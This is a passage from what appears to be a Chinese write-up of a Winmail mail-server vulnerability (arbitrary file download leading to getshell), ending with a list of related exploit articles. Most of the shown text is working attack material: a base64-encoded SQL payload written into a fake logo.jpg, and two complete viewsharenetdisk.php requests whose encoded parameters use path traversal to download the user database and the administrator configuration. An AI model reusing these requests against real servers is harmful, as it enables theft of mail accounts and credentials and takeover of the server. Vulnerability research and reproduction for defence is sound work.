0hBUigyNTYpIE5VTEwsIFtvbGRwYXNzd29yZF0gVkFSQ0hBUigxMjgpIE5VTEwsIFttYWlsaG9zdF0gVkFSQ0hBUigxMjgpIE5VTEwsIFtvbGRtYWlsaG9zdF0gVkFSQ0hBUigxMjgpIE5VTEwsIFtzeW5jYWN0aW9uXSBWQVJDSEFSKDMyKSBOVUxMKQoAAAACA+YAA+YD8QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACgQXDQFhZG1pbgIOBCENCXBvc3RtYXN0ZXIAAAAAbnRyb2xdIFRJTllJTlQsIA0KICBbc2VuZGRvbWFpbmxpc3RdIFRFWFQsIA0KICBbcmVjdmNvbnRyb2xdIFRJTllJTlQsIA0KICBbcmVjdmRvbWFpbmxpc3RdIFRFWFQsIA0KICBbcmlnaHRzXSBWQVJDSEFSKDY0KSwgDQogIFttYXhtc2dzaXplXSBJTlQsIA0KICBbc2VuZGZyZXFdIElOVCwgDQogIFtsb2NhbHRpbWVzXSBJTlQsIA0KICBbbG9jYWxzaXplXSBCSUdJTlQsIA0KICBbcmVtb3RldGltZXNdIElOVCwgDQogIFtyZW1vdGVzaXplXSBCSUdJTlQsIA0KICBbc210cGFjbF0gVEVYVCwgDQogIFtwb3AzYWNsXSBURVhULCANCiAgW2ltYXBhY2xdIFRFWFQsIA0KICBbd2VibWFpbGFjbF0gVEVYVCwgDQogIFtmdHBhY2xdIFRFWFQsIA0KICBbY2hncGFzc3dvcmRdIFRJTllJTlQsIA0KICBbbGFzdGNoZ3B3ZHRpbWVdIEJJR0lOVCwgDQogIFtwd2RleHBpcmVkYXlzXSBJTlQsIA0KICBbYXV0b3JlcGx5c3RhdHVzXSBUSU5ZSU5ULCANCiAgW2ZvcndhcmRhZGRyXSBURVhULCANCiAgW2Z3ZHNhdmVjb3B5XSBUSU5ZSU5ULCANCiAgW21haWxub3RpZnldIFRJTllJTlQsIA0KICBbc3BhbWFzc2Fzc2luXSBUSU5ZSU5ULCANCiAgW3NwYW1kZWFsaW5nXSBUSU5ZSU5ULCANCiAgW2V4cGlyZXRpbWVdIEJJR0lOVCwgDQogIFtjcmVhdGV0aW1lXSBCSUdJTlQsIA0KICBbbGFzdHZpc2l0dGltZV0gQklHSU5ULCANCiAgW3BhdXNldGltZV0gQklHSU5ULCANCiAgW21heHJjcHRdIElOVCwgW2F1dG9hcmNoaXZlXSBWQVJDSEFSKDEyOCkgTlVMTCwgW2F1dG9jbGVhbnVwXSBWQVJDSEFSKDEyOCkgTlVMTCwgW3NlY3JldGxldmVsXSBJTlQgTlVMTCwgW3dlaXhpbl0gVkFSQ0hBUigyNTYpIE5VTEwsIFtkaW5nXSBWQVJDSEFSKDI1NikgTlVMTCwgW29sZHBhc3N3b3JkXSBWQVJDSEFSKDEyOCkgTlVMTCwgW21haWxob3N0XSBWQVJDSEFSKDEyOCkgTlVMTCwgW29sZG1haWxob3N0XSBWQVJDSEFSKDEyOCkgTlVMTCwgW3N5bmNhY3Rpb25dIFZBUkNIQVIoMzIpIE5VTEwsIFtzeW5jdGltZV0gQklHSU5UIE5VTEwp&f_domain=fghfgfghf1&customizepath=1

写入customer/fghfgfghf1_logo.jpg文件

下载用户数据


viewsharenetdisk.php?userid=admin&f=bWFpbHVzZXJfZGJmaWxlPS5cY3VzdG9tZXJcZmdoZmdmZ2hmMV9sb2dvLmpwZyZ1c2VyY29kZT1kMWRmZDg4YTgwZTVjOWU4OTU2ODZhM2ZiYmUwMDI3OSZvcHQ9ZG93bmxvYWQmZmlsZW5hbWU9WEM0dUx5NHVMMlJoZEdFdmJXRnBiSFZ6WlhJdVpHST0maXRlbWNvZGU9YTMwMzk4ODJhMDk1M2RmM2E4NDBlOTVkZjBhNDg3NjImY2hrc3VtPTM1OGE2OTJlODk4OWQ0NDVhZGQ2YjU1OGNjYjU1Y2UxJnN0YXJ0PTEmbmV0ZGlza19zaGFyZV9leHBpcmU9MTQ3OTg2NTY5MzE=

 

下载管理员数据

viewsharenetdisk.php?userid=admin&f=bWFpbHVzZXJfZGJmaWxlPS5cY3VzdG9tZXJcZmdoZmdmZ2hmMV9sb2dvLmpwZyZ1c2VyY29kZT1kMWRmZDg4YTgwZTVjOWU4OTU2ODZhM2ZiYmUwMDI3OSZvcHQ9ZG93bmxvYWQmZmlsZW5hbWU9WEM0dUx5NHVMMlJoZEdFdllXUnRhVzUxYzJWeUxtTm1adz09Jml0ZW1jb2RlPTZhNzgzMTMzMjE5OGU0ZDU1NmQyYWY5ZDYxZWI4ZmIwJmNoa3N1bT1kYWI4YTQwN2JhMGFjOGRhYThhZjQyN2Q2NDU0OTQzZiZzdGFydD0xJm5ldGRpc2tfc2hhcmVfZXhwaXJlPTE0Nzk4NjU2OTMx

 





以上是关于winmail getshell源码分析(任意文件下载)的主要内容,如果未能解决你的问题,请参考以下文章

通达OA任意用户登录和后台GetShell漏洞复现

基于SQL注入漏洞读写文件Getshell技巧

ZZZPHP1.61 代码审计-从SQL注入到Getshell

代码审计MIPCMS 远程写入配置文件Getshell

帝国CMS(EmpireCMS) v7.5后台getshell分析(CVE-2018-18086)

致远A8任意文件写入漏洞_getshell_exp